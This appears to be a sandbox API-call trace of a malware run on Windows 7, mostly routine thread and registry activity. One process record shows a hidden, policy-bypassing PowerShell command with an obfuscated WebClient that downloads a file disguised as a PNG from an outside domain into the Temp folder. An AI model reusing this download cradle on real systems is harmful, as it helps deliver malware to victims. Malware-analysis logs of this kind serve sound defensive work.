	[0250.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.317] CoTaskMemFree (pv=0x506ba0) 
	[0251.991] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x506fe0
	[0259.152] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x507200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.152] CoTaskMemFree (pv=0x507200) 
	[0259.165] CoTaskMemAlloc (cb=0x104) returned 0x507200
	[0259.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x507200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.165] CoTaskMemFree (pv=0x507200) 
	[0259.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74

Thread:
	id = 57
	os_tid = 0x8d8


Thread:
	id = 60
	os_tid = 0x8dc


Thread:
	id = 65
	os_tid = 0x824


Thread:
	id = 105
	os_tid = 0x9f4


Thread:
	id = 109
	os_tid = 0x578

	[0061.557] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0149.313] LocalFree (hMem=0x4b3af0) returned 0x0
	[0149.313] CloseHandle (hObject=0x1d0) returned 1
	[0149.313] CloseHandle (hObject=0x13) returned 1
	[0149.314] CloseHandle (hObject=0xf) returned 1
	[0149.314] RegCloseKey (hKey=0x310) returned 0x0
	[0149.314] RegCloseKey (hKey=0x30c) returned 0x0
	[0149.314] RegCloseKey (hKey=0x308) returned 0x0
	[0149.314] LocalFree (hMem=0x4b38c0) returned 0x0
	[0149.314] RegCloseKey (hKey=0x330) returned 0x0
	[0180.568] RegCloseKey (hKey=0x324) returned 0x0
	[0219.023] RegCloseKey (hKey=0x398) returned 0x0
	[0219.024] RegCloseKey (hKey=0x37c) returned 0x0
	[0219.024] RegCloseKey (hKey=0x378) returned 0x0
	[0219.024] RegCloseKey (hKey=0x374) returned 0x0
	[0219.024] RegCloseKey (hKey=0x370) returned 0x0
	[0219.024] RegCloseKey (hKey=0x36c) returned 0x0
	[0219.025] RegCloseKey (hKey=0x368) returned 0x0
	[0219.025] RegCloseKey (hKey=0x344) returned 0x0
	[0219.025] RegCloseKey (hKey=0x394) returned 0x0
	[0219.025] RegCloseKey (hKey=0x360) returned 0x0
	[0219.026] RegCloseKey (hKey=0x35c) returned 0x0
	[0219.026] RegCloseKey (hKey=0x358) returned 0x0
	[0219.026] RegCloseKey (hKey=0x354) returned 0x0
	[0219.026] RegCloseKey (hKey=0x350) returned 0x0
	[0219.026] RegCloseKey (hKey=0x34c) returned 0x0
	[0219.027] RegCloseKey (hKey=0x348) returned 0x0
	[0219.027] RegCloseKey (hKey=0x390) returned 0x0
	[0219.027] RegCloseKey (hKey=0x38c) returned 0x0
	[0219.027] RegCloseKey (hKey=0x338) returned 0x0
	[0219.027] RegCloseKey (hKey=0x1d0) returned 0x0
	[0219.028] RegCloseKey (hKey=0x310) returned 0x0
	[0219.028] RegCloseKey (hKey=0x30c) returned 0x0
	[0219.028] RegCloseKey (hKey=0x308) returned 0x0
	[0219.028] RegCloseKey (hKey=0x330) returned 0x0
	[0219.028] RegCloseKey (hKey=0x334) returned 0x0
	[0219.029] RegCloseKey (hKey=0x1cc) returned 0x0
	[0219.029] RegCloseKey (hKey=0x1c8) returned 0x0
	[0219.029] RegCloseKey (hKey=0x388) returned 0x0
	[0219.029] RegCloseKey (hKey=0x384) returned 0x0
	[0219.029] RegCloseKey (hKey=0x364) returned 0x0

Thread:
	id = 203
	os_tid = 0xad4


Process:
	id = "8"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x20230000"
	os_pid = "0x31c"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "4"
	os_parent_pid = "0x83c"
	cmd_line = "PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 53
	os_tid = 0x8e8

	[0061.552] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0062.734] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0062.735] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0062.735] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0062.735] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0064.650] GetVersionExW (in: lpVersionInformation=0x1dd970*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1dd970*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0064.651] GetVersionExW (in: lpVersionInformation=0x1dd970*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1dd970*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0064.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dd630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.714] GetVersionExW (in: lpVersionInformation=0x1dd6e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1dd6e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0064.715] SetErrorMode (uMode=0x1) returned 0x1
	[0064.715] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1dd840 | out: lpFileInformation=0x1dd840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0064.716] SetErrorMode (uMode=0x1) returned 0x1
	[0064.749] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ddab0 | out: lpdwHandle=0x1ddab0) returned 0x94c
	[0064.790] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bc7370 | out: lpData=0x2bc7370) returned 1
	[0064.795] VerQueryValueW (in: pBlock=0x2bc7370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1dda28, puLen=0x1dda20 | out: lplpBuffer=0x1dda28*=0x2bc740c, puLen=0x1dda20) returned 1
	[0064.797] lstrlenW (lpString="䅁") returned 1
	[0064.806] VerQueryValueW (in: pBlock=0x2bc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1dd998, puLen=0x1dd990 | out: lplpBuffer=0x1dd998*=0x2bc74e8, puLen=0x1dd990) returned 1
	[0064.807] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0064.808] CoTaskMemAlloc (cb=0x2e) returned 0x46bfa0
	[0064.808] lstrcpyW (in: lpString1=0x46bfa0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0064.809] CoTaskMemFree (pv=0x46bfa0) 
	[0064.809] VerQueryValueW (in: pBlock=0x2bc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1dd998, puLen=0x1dd990 | out: lplpBuffer=0x1dd998*=0x2bc753c, puLen=0x1dd990) returned 1
	[0064.809] lstrlenW (lpString="System.Management.Automation") returned 28
	[0064.809] CoTaskMemAlloc (cb=0x3c) returned 0x420e30
	[0064.809] lstrcpyW (in: lpString1=0x420e30, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0064.809] CoTaskMemFree (pv=0x420e30) 
	[0064.810] VerQueryValueW (in: pBlock=0x2bc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1dd998, puLen=0x1dd990 | out: lplpBuffer=0x1dd998*=0x2bc7598, puLen=0x1dd990) returned 1
	[0064.810] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0064.810] CoTaskMemAlloc (cb=0x20) returned 0x472290
	[0064.810] lstrcpyW (in: lpString1=0x472290, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0064.810] CoTaskMemFree (pv=0x472290) 
	[0064.810] VerQueryValueW (in: pBlock=0x2bc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1dd998, puLen=0x1dd990 | out: lplpBuffer=0x1dd998*=0x2bc75d8, puLen=0x1dd990) returned 1
	[0064.810] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0064.810] CoTaskMemAlloc (cb=0x44) returned 0x420e30
	[0064.810] lstrcpyW (in: lpString1=0x420e30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0064.810] CoTaskMemFree (pv=0x420e30) 
	[0064.810] VerQueryValueW (in: pBlock=0x2bc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1dd998, puLen=0x1dd990 | out: lplpBuffer=0x1dd998*=0x2bc7640, puLen=0x1dd990) returned 1
	[0064.810] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0064.810] CoTaskMemAlloc (cb=0x76) returned 0x40f3d0
	[0064.810] lstrcpyW (in: lpString1=0x40f3d0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0064.810] CoTaskMemFree (pv=0x40f3d0) 
	[0064.810] VerQueryValueW (in: pBlock=0x2bc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1dd998, puLen=0x1dd990 | out: lplpBuffer=0x1dd998*=0x2bc76dc, puLen=0x1dd990) returned 1
	[0064.810] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0064.810] CoTaskMemAlloc (cb=0x44) returned 0x420e30
	[0064.810] lstrcpyW (in: lpString1=0x420e30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0064.810] CoTaskMemFree (pv=0x420e30) 
	[0064.810] VerQueryValueW (in: pBlock=0x2bc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1dd998, puLen=0x1dd990 | out: lplpBuffer=0x1dd998*=0x2bc7740, puLen=0x1dd990) returned 1
	[0064.810] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0064.810] CoTaskMemAlloc (cb=0x58) returned 0x3c65c0
	[0064.810] lstrcpyW (in: lpString1=0x3c65c0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0064.810] CoTaskMemFree (pv=0x3c65c0) 
	[0064.810] VerQueryValueW (in: pBlock=0x2bc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1dd998, puLen=0x1dd990 | out: lplpBuffer=0x1dd998*=0x2bc77bc, puLen=0x1dd990) returned 1
	[0064.810] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0064.810] CoTaskMemAlloc (cb=0x20) returned 0x472290
	[0064.810] lstrcpyW (in: lpString1=0x472290, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0064.810] CoTaskMemFree (pv=0x472290) 
	[0064.810] VerQueryValueW (in: pBlock=0x2bc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1dd998, puLen=0x1dd990 | out: lplpBuffer=0x1dd998*=0x2bc7464, puLen=0x1dd990) returned 1
	[0064.810] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0064.810] CoTaskMemAlloc (cb=0x66) returned 0x4700c0
	[0064.810] lstrcpyW (in: lpString1=0x4700c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0064.811] CoTaskMemFree (pv=0x4700c0) 
	[0064.811] VerQueryValueW (in: pBlock=0x2bc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1dd998, puLen=0x1dd990 | out: lplpBuffer=0x1dd998*=0x0, puLen=0x1dd990) returned 0
	[0064.811] VerQueryValueW (in: pBlock=0x2bc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1dd998, puLen=0x1dd990 | out: lplpBuffer=0x1dd998*=0x0, puLen=0x1dd990) returned 0
	[0064.811] VerQueryValueW (in: pBlock=0x2bc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1dd998, puLen=0x1dd990 | out: lplpBuffer=0x1dd998*=0x0, puLen=0x1dd990) returned 0
	[0064.811] VerQueryValueW (in: pBlock=0x2bc7370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1dd968, puLen=0x1dd960 | out: lplpBuffer=0x1dd968*=0x2bc740c, puLen=0x1dd960) returned 1
	[0064.843] CoTaskMemAlloc (cb=0x204) returned 0x409060
	[0064.843] VerLanguageNameW (in: wLang=0x0, szLang=0x409060, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0064.845] CoTaskMemFree (pv=0x409060) 
	[0064.845] VerQueryValueW (in: pBlock=0x2bc7370, lpSubBlock="\\", lplpBuffer=0x1dd9b8, puLen=0x1dd9b0 | out: lplpBuffer=0x1dd9b8*=0x2bc7398, puLen=0x1dd9b0) returned 1
	[0064.874] GetCurrentProcessId () returned 0x31c
	[0064.965] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1dc8e0 | out: lpLuid=0x1dc8e0*(LowPart=0x14, HighPart=0)) returned 1
	[0064.968] GetCurrentProcess () returned 0xffffffffffffffff
	[0064.968] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1dc900 | out: TokenHandle=0x1dc900*=0x2f0) returned 1
	[0064.980] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2bcabe8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0064.988] CloseHandle (hObject=0x2f0) returned 1
	[0065.031] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x31c) returned 0x2f0
	[0065.041] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2bcac50, cb=0x200, lpcbNeeded=0x1dd918 | out: lphModule=0x2bcac50, lpcbNeeded=0x1dd918) returned 1
	[0065.059] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13ff20000, lpmodinfo=0x2bcaec0, cb=0x18 | out: lpmodinfo=0x2bcaec0*(lpBaseOfDll=0x13ff20000, SizeOfImage=0x77000, EntryPoint=0x13ff2c63c)) returned 1
	[0065.060] CoTaskMemAlloc (cb=0x804) returned 0x474840
	[0065.060] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13ff20000, lpBaseName=0x474840, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0065.061] CoTaskMemFree (pv=0x474840) 
	[0065.061] CoTaskMemAlloc (cb=0x804) returned 0x474840
	[0065.061] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13ff20000, lpFilename=0x474840, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0065.061] CoTaskMemFree (pv=0x474840) 
	[0065.062] CloseHandle (hObject=0x2f0) returned 1
	[0065.104] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x31c) returned 0x2f0
	[0065.123] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x1dda48 | out: lpExitCode=0x1dda48*=0x103) returned 1
	[0065.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bcb088, Length=0x20000, ResultLength=0x1dda10 | out: SystemInformation=0x12bcb088, ResultLength=0x1dda10*=0xf2b8) returned 0x0
	[0065.209] EnumWindows (lpEnumFunc=0x29866ac, lParam=0x0) returned 1
	[0065.211] GetWindowThreadProcessId (in: hWnd=0x50212, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.211] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.211] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.211] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x334
	[0065.211] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x324
	[0065.211] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.211] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.211] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.211] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.212] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.212] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.212] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.212] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.212] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.212] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x45c
	[0065.212] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.212] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.212] GetWindowThreadProcessId (in: hWnd=0x50228, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x5e0
	[0065.212] GetWindowThreadProcessId (in: hWnd=0x5021c, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x90
	[0065.212] GetWindowThreadProcessId (in: hWnd=0xa00a4, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.212] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x914
	[0065.213] GetWindowThreadProcessId (in: hWnd=0x400d6, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.213] GetWindowThreadProcessId (in: hWnd=0x400fa, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.213] GetWindowThreadProcessId (in: hWnd=0x500d2, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.213] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.213] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.213] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.213] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x4a0
	[0065.213] GetWindowThreadProcessId (in: hWnd=0x4021a, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x840
	[0065.213] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x844
	[0065.213] GetWindowThreadProcessId (in: hWnd=0x401f6, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x46c
	[0065.213] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0xb40
	[0065.213] GetWindowThreadProcessId (in: hWnd=0x40116, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x914
	[0065.214] GetWindowThreadProcessId (in: hWnd=0x700d4, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x988
	[0065.214] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x914
	[0065.214] GetWindowThreadProcessId (in: hWnd=0x201b8, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x950
	[0065.214] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x914
	[0065.214] GetWindowThreadProcessId (in: hWnd=0x201a8, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x914
	[0065.214] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x868
	[0065.214] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x850
	[0065.214] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x830
	[0065.214] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x814
	[0065.214] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x744
	[0065.214] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x2a8
	[0065.215] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x534
	[0065.215] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x5e4
	[0065.215] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x5c4
	[0065.215] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x58c
	[0065.215] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x238
	[0065.215] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x584
	[0065.215] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x7e8
	[0065.215] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x678
	[0065.215] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x35c
	[0065.215] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x1dd770 | out: lpdwProcessId=0x1dd770) returned 0x51c
